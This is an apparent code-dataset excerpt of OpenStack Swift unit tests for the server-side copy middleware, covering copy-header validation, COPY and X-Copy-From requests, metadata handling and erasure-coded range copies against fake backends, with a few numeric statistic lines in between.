self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) def test_COPY_with_single_range(self): # verify that source etag is not copied when copying a range self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'etag': 'bogus etag'}, "abcdefghijklmnop") self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {}) req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 'Range': 'bytes=5-10'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c1/o', path) self.assertNotIn('etag', (h.lower() for h in req_headers)) self.assertEqual('6', req_headers['content-length']) req = swob.Request.blank('/v1/a/c1/o', method='GET') status, headers, body = self.call_ssc(req) self.assertEqual('fghijk', body) @patch_policies(with_ec_default=True) class TestServerSideCopyMiddlewareWithEC(unittest.TestCase): container_info = { 'status': 200, 'write_acl': None, 'read_acl': None, 'storage_policy': None, 'sync_key': None, 'versions': None, } def setUp(self): self.logger = debug_logger('proxy-server') self.logger.thread_locals = ('txn1', '127.0.0.2') self.app = PatchedObjControllerApp( None, FakeMemcache(), account_ring=FakeRing(), container_ring=FakeRing(), logger=self.logger) self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger self.policy = POLICIES.default self.app.container_info = dict(self.container_info) def test_COPY_with_single_range(self): req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 'Range': 'bytes=5-10'}) # turn a real body into fragments segment_size = self.policy.ec_segment_size real_body = ('asdf' * segment_size)[:-10] # split it up into chunks chunks = [real_body[x:x + segment_size] for x in range(0, len(real_body), segment_size)] # we need only first chunk to rebuild 5-10 range fragments = self.policy.pyeclib_driver.encode(chunks[0]) fragment_payloads = [] fragment_payloads.append(fragments) node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) # sanity headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))} responses = [(200, ''.join(node_fragments[i]), headers) for i in range(POLICIES.default.ec_ndata)] responses += [(201, '', {})] * self.policy.object_ring.replicas status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } put_hdrs = [] def capture_conn(host, port, dev, part, method, path, *args, **kwargs): if method == 'PUT': put_hdrs.append(args[0]) with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers, give_connect=capture_conn): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 201) expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity self.assertEqual(expected_puts, len(put_hdrs)) for hdrs in put_hdrs: # etag should not be copied from source self.assertNotIn('etag', (h.lower() for h in hdrs)) def test_COPY_with_invalid_ranges(self): # real body size is segment_size - 10 (just 1 segment) segment_size = self.policy.ec_segment_size real_body = ('a' * segment_size)[:-10] # range is out of real body but in segment size self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size - 10)) # range is out of both real body and segment size self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size + 10)) def _test_invalid_ranges(self, method, real_body, segment_size, req_range): # make a request with range starts from more than real size. body_etag = md5(real_body).hexdigest() req = swob.Request.blank( '/v1/a/c/o', method=method, headers={'Destination': 'c1/o', 'Range': 'bytes=%s' % (req_range)}) fragments = self.policy.pyeclib_driver.encode(real_body) fragment_payloads = [fragments] node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) # sanity headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)), 'X-Object-Sysmeta-Ec-Etag': body_etag} start = int(req_range.split('-')[0]) self.assertTrue(start >= 0) # sanity title, exp = swob.RESPONSE_REASONS[416] range_not_satisfiable_body = \ '<html><h1>%s</h1><p>%s</p></html>' % (title, exp) if start >= segment_size: responses = [(416, range_not_satisfiable_body, headers) for i in range(POLICIES.default.ec_ndata)] else: responses = [(200, ''.join(node_fragments[i]), headers) for i in range(POLICIES.default.ec_ndata)] status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } # TODO possibly use FakeApp here with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 416) self.assertEqual(resp.content_length, len(range_not_satisfiable_body)) self.assertEqual(resp.body, range_not_satisfiable_body) self.assertEqual(resp.etag, body_etag) self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
50.193594
79
0.580344
import mock import unittest from hashlib import md5 from six.moves import urllib from swift.common import swob from swift.common.middleware import copy from swift.common.storage_policy import POLICIES from swift.common.swob import Request, HTTPException from swift.common.utils import closing_if_possible from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing from test.unit.common.middleware.helpers import FakeSwift from test.unit.proxy.controllers.test_obj import set_http_connect, \ PatchedObjControllerApp class TestCopyConstraints(unittest.TestCase): def test_validate_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/subdir/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': '/c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def test_validate_bad_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'bad_object'}) self.assertRaises(HTTPException, copy._check_copy_from_header, req) def test_validate_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'destination': 'c/subdir/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'destination': '/c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def test_validate_bad_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'bad_object'}) self.assertRaises(HTTPException, copy._check_destination_header, req) class TestServerSideCopyMiddleware(unittest.TestCase): def setUp(self): self.app = FakeSwift() self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger def tearDown(self): self.assertEqual(self.app.unclosed_requests, {}) def call_app(self, req, app=None, expect_exception=False): if app is None: app = self.app self.authorized = [] def authorize(req): self.authorized.append(req) if 'swift.authorize' not in req.environ: req.environ['swift.authorize'] = authorize req.headers.setdefault("User-Agent", "Bruce Wayne") status = [None] headers = [None] def start_response(s, h, ei=None): status[0] = s headers[0] = h body_iter = app(req.environ, start_response) body = '' caught_exc = None try: with closing_if_possible(body_iter): for chunk in body_iter: body += chunk except Exception as exc: if expect_exception: caught_exc = exc else: raise if expect_exception: return status[0], headers[0], body, caught_exc else: return status[0], headers[0], body def call_ssc(self, req, **kwargs): return self.call_app(req, app=self.ssc, **kwargs) def assertRequestEqual(self, req, other): self.assertEqual(req.method, other.method) self.assertEqual(req.path, other.path) def test_no_object_in_path_pass_through(self): self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c', method='PUT') status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertEqual(len(self.authorized), 1) self.assertRequestEqual(req, self.authorized[0]) def test_object_pass_through_methods(self): for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']: self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {}) req = Request.blank('/v1/a/c/o', method=method) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') self.assertEqual(len(self.authorized), 1) self.assertRequestEqual(req, self.authorized[0]) self.assertNotIn('swift.orig_req_method', req.environ) def test_basic_put_with_x_copy_from(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) self.assertEqual(self.app.swift_sources[0], 'SSC') self.assertEqual(self.app.swift_sources[1], 'SSC') self.assertNotIn('swift.orig_req_method', req.environ) def test_static_large_object_manifest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'X-Static-Large-Object': 'True', 'Etag': 'should not be sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2?multipart-manifest=get', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o2?multipart-manifest=put')) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_static_large_object(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'X-Static-Large-Object': 'True', 'Etag': 'should not be sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o2')]) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_basic_put_with_x_copy_from_across_container(self): self.app.register('GET', '/v1/a/c1/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o2', self.authorized[1].path) def test_basic_put_with_x_copy_from_across_container_and_account(self): self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}, 'passed') req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_non_zero_content_length(self): req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad Request') def test_copy_non_zero_content_length_with_account(self): req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad Request') def test_copy_with_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_slashes_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_no_object_in_x_copy_from(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_no_object_in_x_copy_from_and_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_bad_x_copy_from_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') def test_copy_server_error_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_with_object_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_object_metadata_and_account(self): self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_basic_COPY(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'etag': 'is sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') self.assertEqual(req.environ['swift.orig_req_method'], 'COPY') def test_basic_DLO(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'x-object-manifest': 'some/path', 'etag': 'is not sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertNotIn('x-object-manifest', self.app.headers[1]) self.assertNotIn('etag', self.app.headers[1]) def test_basic_DLO_manifest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'x-object-manifest': 'some/path', 'etag': 'is sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o?multipart-manifest=get', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy')) self.assertIn('x-object-manifest', self.app.headers[1]) self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path') self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') def test_COPY_source_metadata(self): source_headers = { 'x-object-sysmeta-test1': 'copy me', 'x-object-meta-test2': 'copy me too', 'x-object-transient-sysmeta-test3': 'ditto', 'x-object-sysmeta-container-update-override-etag': 'etag val', 'x-object-sysmeta-container-update-override-size': 'size val', 'x-object-sysmeta-container-update-override-foo': 'bar', 'x-delete-at': 'delete-at-time'} get_resp_headers = source_headers.copy() get_resp_headers['etag'] = 'source etag' self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers, body='passed') def verify_headers(expected_headers, unexpected_headers, actual_headers): for k, v in actual_headers: if k.lower() in expected_headers: expected_val = expected_headers.pop(k.lower()) self.assertEqual(expected_val, v) self.assertNotIn(k.lower(), unexpected_headers) self.assertFalse(expected_headers) self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy0'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy0', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = 